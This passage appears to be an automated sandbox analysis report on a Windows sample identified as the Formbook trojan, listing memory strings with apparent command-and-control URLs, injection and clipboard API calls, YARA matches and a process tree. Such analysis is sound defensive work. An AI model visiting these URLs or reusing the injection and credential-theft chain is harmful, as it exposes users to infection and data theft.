          Source: choice.exe, 00000005.00000003.705564214205.00000000083AB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd
          Source: choice.exe, 00000005.00000002.708575105258.000000000319F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
          Source: choice.exe, 00000005.00000002.708575105258.0000000003170000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
          Source: choice.exe, 00000005.00000002.708584614701.00000000083CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
          Source: choice.exe, 00000005.00000002.708584614701.00000000083CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: choice.exe, 00000005.00000002.708581961090.0000000005E7A000.00000004.10000000.00040000.00000000.sdmp, SjhnWvlTMw.exe, 00000006.00000002.708580526921.000000000385A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.bayarcepat19.click/x7ji/?nhl=VbX4XoU1axPwTLIf98pUGPIzQL60g31CACrHzmj3o8Yh1t/lPrcBk6uAM4j
          Source: choice.exe, 00000005.00000002.708584614701.00000000083CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
          Source: choice.exe, 00000005.00000002.708581961090.00000000064C2000.00000004.10000000.00040000.00000000.sdmp, SjhnWvlTMw.exe, 00000006.00000002.708580526921.0000000003EA2000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
          Source: choice.exe, 00000005.00000002.708584614701.00000000083CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/favicon.ico
          Source: choice.exe, 00000005.00000002.708581961090.0000000006978000.00000004.10000000.00040000.00000000.sdmp, SjhnWvlTMw.exe, 00000006.00000002.708580526921.0000000004358000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://zingara.life/c0mi?9X=EvKH2xeP-DpP307P&nhl=/qBPJVDnAuMkCGTP/HS85thBhnm7sJojL9dSRPkeMTtigtz0zs
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe Code function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe Code function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe Code function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

          E-Banking Fraud

          Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000005.00000002.708574335375.0000000003010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.705383176691.0000000006730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000002.708579283397.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.705376707747.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000002.708579534751.0000000004DE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.708578550328.0000000003FE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.708574335375.0000000003010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.705383176691.0000000006730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.708579283397.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.705376707747.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.708579534751.0000000004DE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.705378813444.0000000004D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.705378813444.0000000004390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.708578550328.00000000035E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0042C223 NtClose,2_2_0042C223
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036734E0 NtCreateMutant,LdrInitializeThunk,2_2_036734E0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672B90 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03672B90
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672A80 NtClose,LdrInitializeThunk,2_2_03672A80
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672D10 NtQuerySystemInformation,LdrInitializeThunk,2_2_03672D10
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03674260 NtSetContextThread,2_2_03674260
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03674570 NtSuspendThread,2_2_03674570
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672B20 NtQueryInformationProcess,2_2_03672B20
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672B00 NtQueryValueKey,2_2_03672B00
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672B10 NtAllocateVirtualMemory,2_2_03672B10
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672BE0 NtQueryVirtualMemory,2_2_03672BE0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672BC0 NtQueryInformationToken,2_2_03672BC0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672B80 NtCreateKey,2_2_03672B80
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672A10 NtWriteFile,2_2_03672A10
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672AC0 NtEnumerateValueKey,2_2_03672AC0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672AA0 NtQueryInformationFile,2_2_03672AA0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036729F0 NtReadFile,2_2_036729F0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036729D0 NtWaitForSingleObject,2_2_036729D0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036738D0 NtGetContextThread,2_2_036738D0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672F30 NtOpenDirectoryObject,2_2_03672F30
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672F00 NtCreateFile,2_2_03672F00
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672FB0 NtSetValueKey,2_2_03672FB0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672E50 NtCreateSection,2_2_03672E50
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672E00 NtQueueApcThread,2_2_03672E00
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672EC0 NtQuerySection,2_2_03672EC0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672ED0 NtResumeThread,2_2_03672ED0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672EB0 NtProtectVirtualMemory,2_2_03672EB0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672E80 NtCreateProcessEx,2_2_03672E80
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672D50 NtWriteVirtualMemory,2_2_03672D50
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672DC0 NtAdjustPrivilegesToken,2_2_03672DC0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672DA0 NtReadVirtualMemory,2_2_03672DA0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672C50 NtUnmapViewOfSection,2_2_03672C50
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672C20 NtSetInformationFile,2_2_03672C20
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672C30 NtMapViewOfSection,2_2_03672C30
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03673C30 NtOpenProcessToken,2_2_03673C30
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672C10 NtOpenProcess,2_2_03672C10
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672CF0 NtDelayExecution,2_2_03672CF0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672CD0 NtEnumerateKey,2_2_03672CD0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03673C90 NtOpenThread,2_2_03673C90
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe Code function: 0_2_00431BE8: GetFullPathNameW,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe Code function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
          Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 036AE692 appears 84 times
          Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0362B910 appears 266 times
          Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03675050 appears 36 times
          Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03687BE4 appears 88 times
          Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 036BEF10 appears 105 times
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe Code function: String function: 004115D7 appears 36 times
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe Code function: String function: 00416C70 appears 39 times
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe Code function: String function: 00445AE0 appears 65 times
          Source: 8EhMjL3yNF.exe, 00000000.00000003.703518951457.0000000004C8D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 8EhMjL3yNF.exe
          Source: 8EhMjL3yNF.exe, 00000000.00000003.703521898586.0000000004923000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 8EhMjL3yNF.exe
          Source: 8EhMjL3yNF.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.708578550328.0000000003FE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.708574335375.0000000003010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.705383176691.0000000006730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.708579283397.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.705376707747.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.708579534751.0000000004DE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.705378813444.0000000004D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.705378813444.0000000004390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.708578550328.00000000035E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@18/12
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe Code function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe Code function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe Code function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe Code function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_004755C4
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe Code function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,0_2_0047839D
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe Code function: 0_2_0043305F FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe File created: C:\Users\user\AppData\Local\Temp\unjust
          Source: 8EhMjL3yNF.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: 8EhMjL3yNF.exe ReversingLabs: Detection: 57%
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe File read: C:\Users\user\Desktop\8EhMjL3yNF.exe
          Source: unknown Process created: C:\Users\user\Desktop\8EhMjL3yNF.exe "C:\Users\user\Desktop\8EhMjL3yNF.exe"
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\8EhMjL3yNF.exe"
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe Process created: C:\Windows\SysWOW64\choice.exe "C:\Windows\SysWOW64\choice.exe"
          Source: C:\Windows\SysWOW64\choice.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\8EhMjL3yNF.exe"Jump to behavior
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeProcess created: C:\Windows\SysWOW64\choice.exe "C:\Windows\SysWOW64\choice.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\choice.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeSection loaded: wsock32.dllJump to behavior
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: ieframe.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: mlang.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: winsqlite3.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: vaultcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: C:\Windows\SysWOW64\choice.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: 8EhMjL3yNF.exeStatic file information: File size 1336099 > 1048576
          Source: Binary string: choice.pdbGCTL source: svchost.exe, 00000002.00000003.705345811797.000000000302B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.705345727655.000000000301A000.00000004.00000020.00020000.00000000.sdmp, SjhnWvlTMw.exe, 00000004.00000003.707411095047.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: SjhnWvlTMw.exe, 00000004.00000002.708576351890.0000000000D1E000.00000002.00000001.01000000.00000004.sdmp, SjhnWvlTMw.exe, 00000006.00000000.705443693958.0000000000D1E000.00000002.00000001.01000000.00000004.sdmp
          Source: Binary string: wntdll.pdbUGP source: 8EhMjL3yNF.exe, 00000000.00000003.703520236870.0000000004800000.00000004.00001000.00020000.00000000.sdmp, 8EhMjL3yNF.exe, 00000000.00000003.703518152149.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.705378005011.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.705288151288.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.705378005011.000000000372D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.705284845460.0000000003200000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000005.00000002.708579944136.0000000004F70000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000005.00000002.708579944136.000000000509D000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000005.00000003.705377011026.0000000004C19000.00000004.00000020.00020000.00000000.sdmp, 